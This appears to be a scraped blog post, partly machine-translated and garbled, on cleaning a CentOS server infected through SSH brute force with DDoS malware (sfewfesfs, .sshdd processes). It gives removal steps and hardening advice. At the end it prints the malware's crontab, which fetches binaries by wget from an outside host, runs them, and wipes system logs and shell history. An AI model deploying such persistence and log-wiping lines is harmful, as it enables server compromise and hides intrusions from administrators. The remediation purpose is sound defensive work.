unknow processes dsfref, gfhddsfew, dsfref etc are starting automatically in centos 6.5<\/p>\n
Virus mainly present in \/etc\/init.d\/. Virus will run automatic on the time system start, so remove entry from \/etc\/init.d. These are virus and its locations<\/p>\n
\/etc\/dsfref,<\/p>\n
\/etc\/gfhddsfew<\/p>\n
\/etc\/dsfref<\/p>\n
To Remove Virus from linux<\/p>\n
Note: I used chattr -i to change permissions and deleted the file sfewfesfs, when i tried to delete the file without using chattr, its says permissions cant be changed\/file cant be deleted . and one more thing, when i used command #rm \/etc\/sfewfesfs without chattr , the computer restarted, it happened all the time i tried to delete the file without chattr. and these executables show up in running processes only when internt is connected.<\/p>\n
Linux will be poisoned? Why is not this wonderful thing makes me met, and people really like me there, but fortunately there is, or is not depressed brother ~
\nsituation is server access is very slow, can not access basic Gesanchaiwu! DNSpod Santianliangtou email me “D Monitoring notice: Your website inaccessible.”
\nMachine is CentOS, open port 22 root privileges, password length 9 all lowercase letters plus numbers erratic.
\nVPS service provider immediately to inquire about the situation, the feedback was informed of the results of the virus, was hacked<\/p>\n
chattr -i \/etc\/sfewfesfs*
\n rm -rf \/etc\/sfewfesfs*
\n chattr -i \/etc\/gfhjrtfyhuf*
\n rm -rf \/etc\/gfhjrtfyhuf*
\n chattr -i \/etc\/dsfrefr*
\n rm -rf \/etc\/dsfrefr*
\n chattr -i \/etc\/sdmfdsfhjfe*
\n rm -rf \/etc\/sdmfdsfhjfe*
\n chattr -i \/etc\/rewgtf3er4t*
\n rm -rf \/etc\/rewgtf3er4t*
\n chattr -i \/etc\/gfhddsfew*
\n rm -rf \/etc\/gfhddsfew*
\n chattr -i \/etc\/ferwfrre*
\n rm -rf \/etc\/ferwfrre*
\nRecently, I received a call from one of my client regarding the slowness(almost not responsive) of their linux server(running CentOS) and rapid increase in their network traffic. Fortunately this is one of the their lab servers and they did not incur any production outages.<\/p>\n
Here is the output of the top command on this server:<\/p>\n
top command \u2013 text
\ntop screenshot
\n.
\nPID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
\n 1252 root 20 0 66.0g 2.9g 380 S 725.2 38.0 11935:13 .sshdd141199598
\n 2025 root 20 0 423m 1760 0 S 3.2 0.0 0:39.98 gdmorpen
\n 14295 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
\n 14297 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
\n 8316 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
\n 8318 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.47 .sshhdd14119186
\n 8319 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.27 .sshhdd14119186
\n 8321 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.11 .sshhdd14119186
\n 8338 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.67 .sshhdd14119186
\n 8339 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.67 .sshhdd14119186
\n 8341 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
\n 8345 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.10 .sshhdd14119186
\n 8360 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.59 .sshhdd14119186
\n 8364 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.95 .sshhdd14119186
\n 8371 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.94 .sshhdd14119186
\n 8380 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.65 .sshhdd14119186<\/p>\n
top<\/p>\n
Here are the steps that I followed to remove this malware and hopefully this will helps others having the similar issue.<\/p>\n
1. Disconnect the server from network.<\/p>\n
2. Take the backup of root crontab and remove the root crontab. You can restore any relevant entries that you are aware of from the backup.<\/p>\n
3. Remove the following files:
\n#rm \/etc\/gfhjrtfyhuf
\n#rm \/etc\/sfewfesfs
\n#rm \/etc\/gdmorpen
\n#rm \/etc\/fdsfsfvff
\n#rm \/etc\/rewgtf3er4t
\n#rm \/etc\/smarvtd
\n#rm \/etc\/whitptabil
\n#rm \/etc\/.SSH2<\/p>\n
In case you are not able delete any of the above file, you might have to change the permissions and then remove the file:
\n#chattr -i \/etc\/sfewfesfs
\n#rm \/etc\/sfewfesfs<\/p>\n
4. Remove the following files from \/tmp directory:
\n#rm \/tmp\/gfhjrtfyhuf
\n#rm \/tmp\/sfewfesfs
\n#rm \/tmp\/gdmorpen
\n#rm \/tmp\/fdsfsfvff
\n#rm \/tmp\/rewgtf3er4t
\n#rm \/tmp\/smarvtd
\n#rm \/tmp\/whitptabil
\n#rm \/tmp\/.sshdd*<\/p>\n
5. Remove file \u2013 S99local from \/etc\/rc 6. Disable remote root login:<\/p>\n open the file etc\/ssh\/sshd_config and comment change the following value to \u201cno\u201d: 6. Connect\/enable network.<\/p>\n 7. Update System: 8. Now check the current running process and make sure that there are no strange process that are running.<\/p>\n Into the server and found that the machine stop contracting out, bandwidth filled (5 minutes can send 10G). 100% cpu usage, the name can be seen under the topsfewfesfs process there .sshddXXXXXXXXXXX (a string of random numbers) process. \/ Etc \/ down to see the name sfewfesfs, nhgbhhj and other strange names “red name” file. passwd PermitRootLogin no netstat -atunlp ll \/proc\/??PID chattr -i \/etc\/sfewfesfs* rm -rf \/etc\/nhgbhhj rm -rf \/var\/spool\/cron\/root rm -rf \/etc\/.SSH2 rm -rf \/tmp\/.sshdd140* But the 22-port for VPS renter is to be opened, and the need to root account and privileges! Swollen what to do? Other trick it? Is to change the root user name \ud83d\ude41 no specific order, you can only modify the configuration file) vi \/etc\/passwd vi \/etc\/shadow vi \/etc\/sudoers *\/1 * * * * killall -9 .IptabLes unknow processes dsfref, gfhddsfew, dsfref etc are starting automatically in centos 6.5<\/p>\n Virus mainly present in \/etc\/init.d\/. Virus will run automatic on the time system start, so remove entry from \/etc\/init.d. These are virus and its locations<\/p>\n \/etc\/dsfref,<\/p>\n \/etc\/gfhddsfew<\/p>\n \/etc\/dsfref<\/p>\n To Remove Virus from linux<\/p>\n Note: I used chattr -i to change permissions and deleted […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,4],"tags":[],"_links":{"self":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts\/3726"}],"collection":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3726"}],"version-history":[{"count":1,"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts\/3726\/revisions"}],"predecessor-version":[{"id":3727,"href":"https:\/\/mohan.sg\/index.php?rest_route=\/wp\/v2\/posts\/3726\/revisions\/3727"}],"wp:attachment":[{"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3726"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3726"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mohan.sg\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3726"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\n#rm \/etc\/rc2.d\/S99local
\n#rm \/etc\/rc2.d\/S99local
\n#rm \/etc\/rc3.d\/S99local
\n#rm \/etc\/rc4.d\/S99local<\/p>\n
\n# Prevent root logins:
\nPermitRootLogin no<\/p>\n
\n#yum update<\/p>\n
\n22-port operation is also needed because the network service provider in the case not to force, only select the backup data reloading! Here the detoxification method of publicity, and then respondBrute force tactics are also summarized below:
\nIf you are within the network users, modify the external network to map port 22 to XXXX, change the root password:<\/p>\n
\n22 closed root privileges
\nfound in the \/ etc \/ ssh \/ sshd_config file remove # PermitRootLogin changed<\/p>\n
\nView occupied port<\/p>\n
\nSee sfewfesfs and .sshdd1401029348 contracting process
\nView the process position<\/p>\n
\nDelete virus files<\/p>\n
\nrm -rf \/etc\/sfewfesfs*
\nSee suspicious file named nhgbhhj be deleted, etc.<\/p>\n
\nrm -rf \/etc\/nhgbhhj***
\nTo delete a scheduled task ( very important ), the virus by the resurrection!<\/p>\n
\nrm -rf \/var\/spool\/cron\/root.1
\n.SSH2 See hidden files with ls -al, delete<\/p>\n
\n.sshdd1401029348 See hidden files with ls -al, delete<\/p>\n
\nRestart the server to get.
\nGreat God emphasize online: root privileges port 22 open or not, nozuonodie, for the first time experienced linux poisoning once thought it was a very secure operating system in -_- !, once it felt cool, careless.
\nPoisoning reason to remind<\/p>\n
\n—- The following is important to emphasize in this article where —-
\nseemingly secure system is how the invasion of the pinch? The reason is that port 22 is open, with a simple root username + password, for example:
\nroot123
\nHackers use of brute force, is to use the “User Name” + “Password” exhaustive manner remote login, because Linux system default administrator username is root, just brute force password crackers, you can only nozuonodie the ~~
\nRecruit<\/p>\n
\nroot user login, vi modify \/ etc \/ passwd & \/ etc \/ shadow
\n(Not sure which of the two documents, please learn:\/ Etc \/ passwd & \/ etc \/ shadow Comments )<\/p>\n
\nPress the i key to enter edit mode
\nto modify the 1st row a root for a new user name
\n, press esc to exit edit mode, and enter: x save and exit<\/p>\n
\nPress the i key to enter edit mode
\nto modify the 1st row a root for a new user name
\n, press esc to exit edit mode, and enter:! x forced to save and exit
\nNOTE: In order to properly use sudo, you need to modify \/ etc \/ sudoers settings, modify as follows (fromHow to add Users to \/ etc \/ sudoers ):<\/p>\n
\nFind the root ALL = (ALL) ALL
\nadd the following line: a new username ALL = (ALL) ALL
\n: x forced to save and exit!
\nReconnect, enter a new user name + the original root password! You’re done! !
\nAttached virus script<\/p>\n
\n*\/1 * * * * killall -9 nfsd4
\n*\/1 * * * * killall -9 profild.key
\n*\/1 * * * * killall -9 nfsd
\n*\/1 * * * * killall -9 DDosl
\n*\/1 * * * * killall -9 lengchao32
\n*\/1 * * * * killall -9 b26
\n*\/1 * * * * killall -9 codelove
\n*\/1 * * * * killall -9 32
\n*\/1 * * * * killall -9 64
\n*\/1 * * * * killall -9 new6
\n*\/1 * * * * killall -9 new4
\n*\/1 * * * * killall -9 node24
\n*\/1 * * * * killall -9 freeBSD
\n*\/99 * * * * killall -9 sdmfdsfhjfe
\n*\/98 * * * * killall -9 gfhjrtfyhuf
\n*\/97 * * * * killall -9 sdmfdsfhjfe
\n*\/96 * * * * killall -9 rewgtf3er4t
\n*\/95 * * * * killall -9 ferwfrre
\n*\/94 * * * * killall -9 dsfrefr
\n*\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/gfhjrtfyhuf
\n*\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/sfewfesfs
\n*\/130 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/sdmfdsfhjfe
\n*\/130 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/gfhddsfew
\n*\/140 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/rewgtf3er4t
\n*\/140 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/ferwfrre
\n*\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/dsfrefr
\n*\/120 * * * * cd \/root;rm -rf dir nohup.out
\n*\/360 * * * * cd \/etc;rm -rf dir gfhjrtfyhuf
\n*\/360 * * * * cd \/etc;rm -rf dir dsfrefr
\n*\/360 * * * * cd \/etc;rm -rf dir sdmfdsfhjfe
\n*\/360 * * * * cd \/etc;rm -rf dir rewgtf3er4t
\n*\/360 * * * * cd \/etc;rm -rf dir gfhddsfew
\n*\/360 * * * * cd \/etc;rm -rf dir ferwfrre
\n*\/1 * * * * cd \/etc;rm -rf dir sfewfesfs.*
\n*\/1 * * * * cd \/etc;rm -rf dir gfhjrtfyhuf.*
\n*\/1 * * * * cd \/etc;rm -rf dir dsfrefr.*
\n*\/1 * * * * cd \/etc;rm -rf dir sdmfdsfhjfe.*
\n*\/1 * * * * cd \/etc;rm -rf dir rewgtf3er4t.*
\n*\/1 * * * * cd \/etc;rm -rf dir gfhddsfew.*
\n*\/1 * * * * cd \/etc;rm -rf dir ferwfrre.*
\n*\/1 * * * * chmod 7777 \/etc\/gfhjrtfyhuf
\n*\/1 * * * * chmod 7777 \/etc\/sfewfesfs
\n*\/1 * * * * chmod 7777 \/etc\/dsfrefr
\n*\/1 * * * * chmod 7777 \/etc\/sdmfdsfhjfe
\n*\/1 * * * * chmod 7777 \/etc\/rewgtf3er4t
\n*\/1 * * * * chmod 7777 \/etc\/gfhddsfew
\n*\/1 * * * * chmod 7777 \/etc\/ferwfrre
\n*\/99 * * * * nohup \/etc\/sfewfesfs > \/dev\/null 2>&1&
\n*\/100 * * * * nohup \/etc\/sdmfdsfhjfe > \/dev\/null 2>&1&
\n*\/99 * * * * nohup \/etc\/gfhjrtfyhuf > \/dev\/null 2>&1&
\n*\/98 * * * * nohup \/etc\/sdmfdsfhjfe > \/dev\/null 2>&1&
\n*\/97 * * * * nohup \/etc\/rewgtf3er4t > \/dev\/null 2>&1&
\n*\/96 * * * * nohup \/etc\/ferwfrre > \/dev\/null 2>&1&
\n*\/95 * * * * nohup \/etc\/dsfrefr > \/dev\/null 2>&1&
\n*\/1 * * * * echo “unset MAILCHECK” >> \/etc\/profile
\n*\/1 * * * * rm -rf \/root\/.bash_history
\n*\/1 * * * * touch \/root\/.bash_history
\n*\/1 * * * * history -r
\n*\/1 * * * * cd \/var\/log > dmesg
\n*\/1 * * * * cd \/var\/log > auth.log
\n*\/1 * * * * cd \/var\/log > alternatives.log
\n*\/1 * * * * cd \/var\/log > boot.log
\n*\/1 * * * * cd \/var\/log > btmp
\n*\/1 * * * * cd \/var\/log > cron
\n*\/1 * * * * cd \/var\/log > cups
\n*\/1 * * * * cd \/var\/log > daemon.log
\n*\/1 * * * * cd \/var\/log > dpkg.log
\n*\/1 * * * * cd \/var\/log > faillog
\n*\/1 * * * * cd \/var\/log > kern.log
\n*\/1 * * * * cd \/var\/log > lastlog
\n*\/1 * * * * cd \/var\/log > maillog
\n*\/1 * * * * cd \/var\/log > user.log
\n*\/1 * * * * cd \/var\/log > Xorg.x.log
\n*\/1 * * * * cd \/var\/log > anaconda.log
\n*\/1 * * * * cd \/var\/log > yum.log
\n*\/1 * * * * cd \/var\/log > secure
\n*\/1 * * * * cd \/var\/log > wtmp
\n*\/1 * * * * cd \/var\/log > utmp
\n*\/1 * * * * cd \/var\/log > messages
\n*\/1 * * * * cd \/var\/log > spooler
\n*\/1 * * * * cd \/var\/log > sudolog
\n*\/1 * * * * cd \/var\/log > aculog
\n*\/1 * * * * cd \/var\/log > access-log
\n*\/1 * * * * cd \/root > .bash_history
\n*\/1 * * * * history -c<\/p>\n","protected":false},"excerpt":{"rendered":"